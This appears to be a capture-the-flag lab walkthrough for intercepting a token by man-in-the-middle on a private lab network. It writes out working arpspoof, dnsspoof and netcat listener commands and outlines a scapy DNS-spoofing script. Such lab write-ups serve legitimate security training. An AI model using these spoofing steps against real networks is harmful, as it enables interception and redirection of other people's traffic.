Token 4: DNS Followup TCP Token

Token: [CAPTURE VIA NC]

Objective

After a successful DNS lookup, dnsvictim.pccc sends this token to port 9001 at {token3}.target.pccc.

Hosts

• dnsvictim.pccc: 10.0.91.134
• dnsmasq.pccc: 10.0.91.133
• Target domain: PCCC-Domain-Name-Simian-02-95yA.target.pccc

Method: DNS Spoof + Listen on Port 9001

Step 1: Set up ARP spoofing

arpspoof -i eth1 -t 10.0.91.134 10.0.91.133 &
arpspoof -i eth1 -t 10.0.91.133 10.0.91.134 &

Step 2: Listen on port 9001

In a separate terminal:

nc -nlvp 9001

Step 3: Spoof DNS response

When the victim queries for PCCC-Domain-Name-Simian-02-95yA.target.pccc, respond with YOUR IP address (10.0.91.138 or your Kali IP).

Using scapy or dnsspoof:

# Create dns spoof entry
echo "10.0.91.138 PCCC-Domain-Name-Simian-02-95yA.target.pccc" > /tmp/dns.txt
dnsspoof -i eth1 -f /tmp/dns.txt

Or use a Python script with scapy to:

1. Sniff DNS queries
2. When query matches token3 domain, send spoofed response pointing to your IP
3. The victim connects to your IP on port 9001 and sends the token

Step 4: Receive the token

The token arrives on your netcat listener on port 9001.

Why It Works

By spoofing the DNS response, you redirect the victim’s connection to your machine. The victim thinks it’s connecting to the legitimate server but actually connects to you and sends the token.

Cleanup

pkill arpspoof
pkill dnsspoof